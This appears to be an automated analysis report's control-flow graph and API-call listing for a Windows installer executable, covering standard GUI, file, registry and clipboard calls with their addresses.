SendMessageW 3735->3782 3739 405320 3736->3739 3741 405342 3736->3741 3742 40530c ShowWindow ShowWindow 3736->3742 3737->3736 3785 405073 OleInitialize 3737->3785 3743 40537e 3739->3743 3745 405331 3739->3745 3746 405357 ShowWindow 3739->3746 3740 40518e 3752 406831 18 API calls 3740->3752 3747 403df6 8 API calls 3741->3747 3784 403dc4 SendMessageW 3742->3784 3743->3741 3748 405389 SendMessageW 3743->3748 3749 403d44 SendMessageW 3745->3749 3750 405377 3746->3750 3751 405369 3746->3751 3757 4052ba 3747->3757 3756 4053a2 CreatePopupMenu 3748->3756 3748->3757 3749->3741 3755 403d44 SendMessageW 3750->3755 3753 404f9e 25 API calls 3751->3753 3754 4051ad 3752->3754 3753->3750 3758 4062cf 11 API calls 3754->3758 3755->3743 3759 406831 18 API calls 3756->3759 3760 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3758->3760 3761 4053b2 AppendMenuW 3759->3761 3762 405203 SendMessageW SendMessageW 3760->3762 3763 40521f 3760->3763 3764 4053c5 GetWindowRect 3761->3764 3765 4053d8 3761->3765 3762->3763 3766 405232 3763->3766 3767 405224 SendMessageW 3763->3767 3768 4053df TrackPopupMenu 3764->3768 3765->3768 3769 403d6b 19 API calls 3766->3769 3767->3766 3768->3757 3770 4053fd 3768->3770 3771 405242 3769->3771 3772 405419 SendMessageW 3770->3772 3773 40524b ShowWindow 3771->3773 3774 40527f GetDlgItem SendMessageW 3771->3774 3772->3772 3775 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3772->3775 3776 405261 ShowWindow 3773->3776 3777 40526e 3773->3777 3774->3757 3778 4052a2 SendMessageW SendMessageW 3774->3778 3779 40545b SendMessageW 3775->3779 3776->3777 3783 403dc4 SendMessageW 3777->3783 3778->3757 3779->3779 3780 405486 GlobalUnlock SetClipboardData CloseClipboard 3779->3780 3780->3757 3782->3740 3783->3774 3784->3739 3786 403ddb SendMessageW 3785->3786 3790 405096 3786->3790 3787 403ddb SendMessageW 3788 4050d1 OleUninitialize 3787->3788 3789 4062cf 11 API calls 3789->3790 3790->3789 3791 40139d 80 API calls 3790->3791 3792 4050c1 3790->3792 
3791->3790 3792->3787 4619 4020f9 GetDC GetDeviceCaps 4620 401446 18 API calls 4619->4620 4621 402116 MulDiv 4620->4621 4622 401446 18 API calls 4621->4622 4623 40212c 4622->4623 4624 406831 18 API calls 4623->4624 4625 402165 CreateFontIndirectW 4624->4625 4626 4030dc 4625->4626 4627 4030e3 4626->4627 4629 405f7d wsprintfW 4626->4629 4629->4627 4630 4024fb 4631 40145c 18 API calls 4630->4631 4632 402502 4631->4632 4633 40145c 18 API calls 4632->4633 4634 40250c 4633->4634 4635 40145c 18 API calls 4634->4635 4636 402515 4635->4636 4637 40145c 18 API calls 4636->4637 4638 40251f 4637->4638 4639 40145c 18 API calls 4638->4639 4640 402529 4639->4640 4641 40253d 4640->4641 4642 40145c 18 API calls 4640->4642 4643 4062cf 11 API calls 4641->4643 4642->4641 4644 40256a CoCreateInstance 4643->4644 4645 40258c 4644->4645 4646 4026fc 4648 402708 4646->4648 4649 401ee4 4646->4649 4647 406831 18 API calls 4647->4649 4649->4646 4649->4647 3793 4019fd 3794 40145c 18 API calls 3793->3794 3795 401a04 3794->3795 3798 405eab 3795->3798 3799 405eb8 GetTickCount GetTempFileNameW 3798->3799 3800 401a0b 3799->3800 3801 405eee 3799->3801 3801->3799 3801->3800 4650 4022fd 4651 40145c 18 API calls 4650->4651 4652 402304 GetFileVersionInfoSizeW 4651->4652 4653 4030e3 4652->4653 4654 40232b GlobalAlloc 4652->4654 4654->4653 4655 40233f GetFileVersionInfoW 4654->4655 4656 402350 VerQueryValueW 4655->4656 4657 402381 GlobalFree 4655->4657 4656->4657 4658 402369 4656->4658 4657->4653 4663 405f7d wsprintfW 4658->4663 4661 402375 4664 405f7d wsprintfW 4661->4664 4663->4661 4664->4657 4665 402afd 4666 40145c 18 API calls 4665->4666 4667 402b04 4666->4667 4672 405e7c GetFileAttributesW CreateFileW 4667->4672 4669 402b10 4670 4030e3 4669->4670 4673 405f7d wsprintfW 4669->4673 4672->4669 4673->4670 4674 4029ff 4675 401553 19 API calls 4674->4675 4676 402a09 4675->4676 4677 40145c 18 API calls 4676->4677 4678 402a12 4677->4678 4679 402a1f RegQueryValueExW 4678->4679 4683 401a13 4678->4683 4680 402a45 
4679->4680 4681 402a3f 4679->4681 4682 4029e4 RegCloseKey 4680->4682 4680->4683 4681->4680 4685 405f7d wsprintfW 4681->4685 4682->4683 4685->4680 4686 401000 4687 401037 BeginPaint GetClientRect 4686->4687 4688 40100c DefWindowProcW 4686->4688 4690 4010fc 4687->4690 4691 401182 4688->4691 4692 401073 CreateBrushIndirect FillRect DeleteObject 4690->4692 4693 401105 4690->4693 4692->4690 4694 401170 EndPaint 4693->4694 4695 40110b CreateFontIndirectW 4693->4695 4694->4691 4695->4694 4696 40111b 6 API calls 4695->4696 4696->4694 4697 401f80 4698 401446 18 API calls 4697->4698 4699 401f88 4698->4699 4700 401446 18 API calls 4699->4700 4701 401f93 4700->4701 4702 401fa3 4701->4702 4703 40145c 18 API calls 4701->4703 4704 401fb3 4702->4704 4705 40145c 18 API calls 4702->4705 4703->4702 4706 402006 4704->4706 4707 401fbc 4704->4707 4705->4704 4708 40145c 18 API calls 4706->4708 4709 401446 18 API calls 4707->4709 4710 40200d 4708->4710 4711 401fc4 4709->4711 4713 40145c 18 API calls 4710->4713 4712 401446 18 API calls 4711->4712 4714 401fce 4712->4714 4715 402016 FindWindowExW 4713->4715 4716 401ff6 SendMessageW 4714->4716 4717 401fd8 SendMessageTimeoutW 4714->4717 4719 402036 4715->4719 4716->4719 4717->4719 4718 4030e3 4719->4718 4721 405f7d wsprintfW 4719->4721 4721->4718 4722 402880 4723 402884 4722->4723 4724 40145c 18 API calls 4723->4724 4725 4028a7 4724->4725 4726 40145c 18 API calls 4725->4726 4727 4028b1 4726->4727 4728 4028ba RegCreateKeyExW 4727->4728 4729 4028e8 4728->4729 4734 4029ef 4728->4734 4730 402934 4729->4730 4732 40145c 18 API calls 4729->4732 4731 402963 4730->4731 4733 401446 18 API calls 4730->4733 4735 4029ae RegSetValueExW 4731->4735 4738 40337f 33 API calls 4731->4738 4736 4028fc lstrlenW 4732->4736 4737 402947 4733->4737 4741 4029c6 RegCloseKey 4735->4741 4742 4029cb 4735->4742 4739 402918 4736->4739 4740 40292a 4736->4740 4744 4062cf 11 API calls 4737->4744 4745 40297b 4738->4745 4746 4062cf 11 API calls 4739->4746 4747 4062cf 11 API calls 
4740->4747 4741->4734 4743 4062cf 11 API calls 4742->4743 4743->4741 4744->4731 4753 406250 4745->4753 4750 402922 4746->4750 4747->4730 4750->4735 4752 4062cf 11 API calls 4752->4750 4754 406273 4753->4754 4755 4062b6 4754->4755 4756 406288 wsprintfW 4754->4756 4757 402991 4755->4757 4758 4062bf lstrcatW 4755->4758 4756->4755 4756->4756 4757->4752 4758->4757 4759 403d02 4760 403d0d 4759->4760 4761 403d11 4760->4761 4762 403d14 GlobalAlloc 4760->4762 4762->4761 4763 402082 4764 401446 18 API calls 4763->4764 4765 402093 SetWindowLongW 4764->4765 4766 4030e3 4765->4766 4767 402a84 4768 401553 19 API calls 4767->4768 4769 402a8e 4768->4769 4770 401446 18 API calls 4769->4770 4771 402a98 4770->4771 4772 401a13 4771->4772 4773 402ab2 RegEnumKeyW 4771->4773 4774 402abe RegEnumValueW 4771->4774 4775 402a7e 4773->4775 4774->4772 4774->4775 4775->4772 4776 4029e4 RegCloseKey 4775->4776 4776->4772 4777 402c8a 4778 402ca2 4777->4778 4779 402c8f 4777->4779 4781 40145c 18 API calls 4778->4781 4780 401446 18 API calls 4779->4780 4783 402c97 4780->4783 4782 402ca9 lstrlenW 4781->4782 4782->4783 4784 401a13 4783->4784 4785 402ccb WriteFile 4783->4785 4785->4784 4786 401d8e 4787 40145c 18 API calls 4786->4787 4788 401d95 ExpandEnvironmentStringsW 4787->4788 4789 401da8 4788->4789 4790 401db9 4788->4790 4789->4790 4791 401dad lstrcmpW 4789->4791 4791->4790 4792 401e0f 4793 401446 18 API calls 4792->4793 4794 401e17 4793->4794 4795 401446 18 API calls 4794->4795 4796 401e21 4795->4796 4797 4030e3 4796->4797 4799 405f7d wsprintfW 4796->4799 4799->4797 4800 40438f 4801 4043c8 4800->4801 4802 40439f 4800->4802 4803 403df6 8 API calls 4801->4803 4804 403d6b 19 API calls 4802->4804 4806 4043d4 4803->4806 4805 4043ac SetDlgItemTextW 4804->4805 4805->4801 4807 403f90 4808 403fa0 4807->4808 4809 403fbc 4807->4809 4818 405cb0 GetDlgItemTextW 4808->4818 4811 403fc2 SHGetPathFromIDListW 4809->4811 4812 403fef 4809->4812 4814 403fd2 4811->4814 4817 403fd9 SendMessageW 4811->4817 4813 403fad 
SendMessageW 4813->4809 4815 40141d 80 API calls 4814->4815 4815->4817 4817->4812 4818->4813 4819 402392 4820 40145c 18 API calls 4819->4820 4821 402399 4820->4821 4824 407224 4821->4824 4825 406efe 25 API calls 4824->4825 4826 407244 4825->4826 4827 4023a7 4826->4827 4828 40724e lstrcpynW lstrcmpW 4826->4828 4829 407280 4828->4829 4830 407286 lstrcpynW 4828->4830 4829->4830 4830->4827 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 
3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4831 402797 4832 40145c 18 API calls 4831->4832 4833 4027ae 4832->4833 4834 40145c 18 API calls 4833->4834 4835 4027b7 4834->4835 4836 40145c 18 API calls 4835->4836 4837 4027c0 GetPrivateProfileStringW lstrcmpW 4836->4837 4838 401e9a 4839 40145c 18 API calls 4838->4839 4840 401ea1 4839->4840 4841 401446 18 API calls 4840->4841 4842 401eab wsprintfW 4841->4842 3802 401a1f 3803 40145c 18 API calls 3802->3803 3804 401a26 3803->3804 3805 4062cf 11 API calls 3804->3805 3806 401a49 3805->3806 3807 401a64 3806->3807 3808 401a5c 3806->3808 3877 406035 lstrcpynW 3807->3877 3876 406035 lstrcpynW 3808->3876 3811 401a6f 3878 40674e lstrlenW CharPrevW 3811->3878 3812 401a62 3815 406064 5 API calls 3812->3815 3846 401a81 3815->3846 3816 406301 2 API calls 3816->3846 3819 401a98 CompareFileTime 3819->3846 3820 401ba9 3821 404f9e 25 API calls 3820->3821 3823 401bb3 3821->3823 3822 401b5d 3824 404f9e 25 API calls 3822->3824 3855 40337f 3823->3855 3826 401b70 3824->3826 3830 4062cf 11 API calls 3826->3830 3828 406035 lstrcpynW 3828->3846 3829 4062cf 11 API calls 3831 401bda 3829->3831 3835 401b8b 3830->3835 3832 401be9 SetFileTime 3831->3832 3833 401bf8 CloseHandle 3831->3833 3832->3833 3833->3835 3836 401c09 3833->3836 3834 406831 18 API calls 3834->3846 3837 401c21 3836->3837 3838 401c0e 3836->3838 3839 406831 18 API 
calls 3837->3839 3840 406831 18 API calls 3838->3840 3841 401c29 3839->3841 3843 401c16 lstrcatW 3840->3843 3844 4062cf 11 API calls 3841->3844 3843->3841 3847 401c34 3844->3847 3845 401b50 3849 401b93 3845->3849 3850 401b53 3845->3850 3846->3816 3846->3819 3846->3820 3846->3822 3846->3828 3846->3834 3846->3845 3848 4062cf 11 API calls 3846->3848 3854 405e7c GetFileAttributesW CreateFileW 3846->3854 3881 405e5c GetFileAttributesW 3846->3881 3884 405ccc 3846->3884 3851 405ccc MessageBoxIndirectW 3847->3851 3848->3846 3852 4062cf 11 API calls 3849->3852 3853 4062cf 11 API calls 3850->3853 3851->3835 3852->3835 3853->3822 3854->3846 3856 40339a 3855->3856 3857 4033c7 3856->3857 3890 403368 SetFilePointer 3856->3890 3888 403336 ReadFile 3857->3888 3861 401bc6 3861->3829 3862 403546 3864 40354a 3862->3864 3865 40356e 3862->3865 3863 4033eb GetTickCount 3863->3861 3868 403438 3863->3868 3866 403336 ReadFile 3864->3866 3865->3861 3869 403336 ReadFile 3865->3869 3870 40358d WriteFile 3865->3870 3866->3861 3867 403336 ReadFile 3867->3868 3868->3861 3868->3867 3872 40348a GetTickCount 3868->3872 3873 4034af MulDiv wsprintfW 3868->3873 3875 4034f3 WriteFile 3868->3875 3869->3865 3870->3861 3871 4035a1 3870->3871 3871->3861 3871->3865 3872->3868 3874 404f9e 25 API calls 3873->3874 3874->3868 3875->3861 3875->3868 3876->3812 3877->3811 3879 401a75 lstrcatW 3878->3879 3880 40676b lstrcatW 3878->3880 3879->3812 3880->3879 3882 405e79 3881->3882 3883 405e6b SetFileAttributesW 3881->3883 3882->3846 3883->3882 3885 405ce1 3884->3885 3886 405d2f 3885->3886 3887 405cf7 MessageBoxIndirectW 3885->3887 3886->3846 3887->3886 3889 403357 3888->3889 3889->3861 3889->3862 3889->3863 3890->3857 4843 40209f GetDlgItem GetClientRect 4844 40145c 18 API calls 4843->4844 4845 4020cf LoadImageW SendMessageW 4844->4845 4846 4030e3 4845->4846 4847 4020ed DeleteObject 4845->4847 4847->4846 4848 402b9f 4849 401446 18 API calls 4848->4849 4853 402ba7 4849->4853 4850 402c4a 4851 402bdf ReadFile 
4851->4853 4860 402c3d 4851->4860 4852 401446 18 API calls 4852->4860 4853->4850 4853->4851 4854 402c06 MultiByteToWideChar 4853->4854 4855 402c3f 4853->4855 4856 402c4f 4853->4856 4853->4860 4854->4853 4854->4856 4861 405f7d wsprintfW 4855->4861 4858 402c6b SetFilePointer 4856->4858 4856->4860 4858->4860 4859 402d17 ReadFile 4859->4860 4860->4850 4860->4852 4860->4859 4861->4850 3417 402b23 GlobalAlloc 3418 402b39 3417->3418 3419 402b4b 3417->3419 3428 401446 3418->3428 3421 40145c 18 API calls 3419->3421 3422 402b52 WideCharToMultiByte lstrlenA 3421->3422 3423 402b41 3422->3423 3424 402b84 WriteFile 3423->3424 3425 402b93 3423->3425 3424->3425 3426 402384 GlobalFree 3424->3426 3426->3425 3429 406831 18 API calls 3428->3429 3430 401455 3429->3430 3430->3423 4862 4040a3 4863 4040b0 lstrcpynW lstrlenW 4862->4863 4864 4040ad 4862->4864 4864->4863 3441 4054a5 3442 4055f9 3441->3442 3443 4054bd 3441->3443 3445 40564a 3442->3445 3446 40560a GetDlgItem GetDlgItem 3442->3446 3443->3442 3444 4054c9 3443->3444 3448 4054d4 SetWindowPos 3444->3448 3449 4054e7 3444->3449 3447 4056a4 3445->3447 3455 40139d 80 API calls 3445->3455 3450 403d6b 19 API calls 3446->3450 3456 4055f4 3447->3456 3511 403ddb 3447->3511 3448->3449 3452 405504 3449->3452 3453 4054ec ShowWindow 3449->3453 3454 405634 SetClassLongW 3450->3454 3457 405526 3452->3457 3458 40550c DestroyWindow 3452->3458 3453->3452 3459 40141d 80 API calls 3454->3459 3462 40567c 3455->3462 3460 40552b SetWindowLongW 3457->3460 3461 40553c 3457->3461 3463 405908 3458->3463 3459->3445 3460->3456 3464 4055e5 3461->3464 3465 405548 GetDlgItem 3461->3465 3462->3447 3466 405680 SendMessageW 3462->3466 3463->3456 3472 405939 ShowWindow 3463->3472 3531 403df6 3464->3531 3469 405578 3465->3469 3470 40555b SendMessageW IsWindowEnabled 3465->3470 3466->3456 3467 40141d 80 API calls 3480 4056b6 3467->3480 3468 40590a DestroyWindow KiUserCallbackDispatcher 3468->3463 3474 405585 3469->3474 3477 4055cc SendMessageW 3469->3477 3478 405598 
3469->3478 3486 40557d 3469->3486 3470->3456 3470->3469 3472->3456 3473 406831 18 API calls 3473->3480 3474->3477 3474->3486 3476 403d6b 19 API calls 3476->3480 3477->3464 3481 4055a0 3478->3481 3482 4055b5 3478->3482 3479 4055b3 3479->3464 3480->3456 3480->3467 3480->3468 3480->3473 3480->3476 3502 40584a DestroyWindow 3480->3502 3514 403d6b 3480->3514 3525 40141d 3481->3525 3483 40141d 80 API calls 3482->3483 3485 4055bc 3483->3485 3485->3464 3485->3486 3528 403d44 3486->3528 3488 405731 GetDlgItem 3489 405746 3488->3489 3490 40574f ShowWindow KiUserCallbackDispatcher 3488->3490 3489->3490 3517 403db1 KiUserCallbackDispatcher 3490->3517 3492 405779 EnableWindow 3495 40578d 3492->3495 3493 405792 GetSystemMenu EnableMenuItem SendMessageW 3494 4057c2 SendMessageW 3493->3494 3493->3495 3494->3495 3495->3493 3518 403dc4 SendMessageW 3495->3518 3519 406035 lstrcpynW 3495->3519 3498 4057f0 lstrlenW 3499 406831 18 API calls 3498->3499 3500 405806 SetWindowTextW 3499->3500 3520 40139d 3500->3520 3502->3463 3503 405864 CreateDialogParamW 3502->3503 3503->3463 3504 405897 3503->3504 3505 403d6b 19 API calls 3504->3505 3506 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3505->3506 3507 40139d 80 API calls 3506->3507 3508 4058e8 3507->3508 3508->3456 3509 4058f0 ShowWindow 3508->3509 3510 403ddb SendMessageW 3509->3510 3510->3463 3512 403df3 3511->3512 3513 403de4 SendMessageW 3511->3513 3512->3480 3513->3512 3515 406831 18 API calls 3514->3515 3516 403d76 SetDlgItemTextW 3515->3516 3516->3488 3517->3492 3518->3495 3519->3498 3523 4013a4 3520->3523 3521 401410 3521->3480 3523->3521 3524 4013dd MulDiv SendMessageW 3523->3524 3545 4015a0 3523->3545 3524->3523 3526 40139d 80 API calls 3525->3526 3527 401432 3526->3527 3527->3486 3529 403d51 SendMessageW 3528->3529 3530 403d4b 3528->3530 3529->3479 3530->3529 3532 403e0b GetWindowLongW 3531->3532 3542 403e94 3531->3542 3533 403e1c 3532->3533 3532->3542 3534 403e2b GetSysColor 3533->3534 3535 403e2e 3533->3535 
3534->3535 3536 403e34 SetTextColor 3535->3536 3537 403e3e SetBkMode 3535->3537 3536->3537 3538 403e56 GetSysColor 3537->3538 3539 403e5c 3537->3539 3538->3539 3540 403e63 SetBkColor 3539->3540 3541 403e6d 3539->3541 3540->3541 3541->3542 3543 403e80 DeleteObject 3541->3543 3544 403e87 CreateBrushIndirect 3541->3544 3542->3456 3543->3544 3544->3542 3546 4015fa 3545->3546 3625 40160c 3545->3625 3547 401601 3546->3547 3548 401742 3546->3548 3549 401962 3546->3549 3550 4019ca 3546->3550 3551 40176e 3546->3551 3552 401650 3546->3552 3553 4017b1 3546->3553 3554 401672 3546->3554 3555 401693 3546->3555 3556 401616 3546->3556 3557 4016d6 3546->3557 3558 401736 3546->3558 3559 401897 3546->3559 3560 4018db 3546->3560 3561 40163c 3546->3561 3562 4016bd 3546->3562 3546->3625 3571 4062cf 11 API calls 3547->3571 3563 401751 ShowWindow 3548->3563 3564 401758 3548->3564 3568 40145c 18 API calls 3549->3568 3575 40145c 18 API calls 3550->3575 3565 40145c 18 API calls 3551->3565 3589 4062cf 11 API calls 3552->3589 3569 40145c 18 API calls 3553->3569 3566 40145c 18 API calls 3554->3566 3570 401446 18 API calls 3555->3570 3574 40145c 18 API calls 3556->3574 3588 401446 18 API calls 3557->3588 3557->3625 3558->3625 3679 405f7d wsprintfW 3558->3679 3567 40145c 18 API calls 3559->3567 3572 40145c 18 API calls 3560->3572 3576 401647 PostQuitMessage 3561->3576 3561->3625 3573 4062cf 11 API calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 
3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 
3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 
4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 

Control-flow Graph

APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
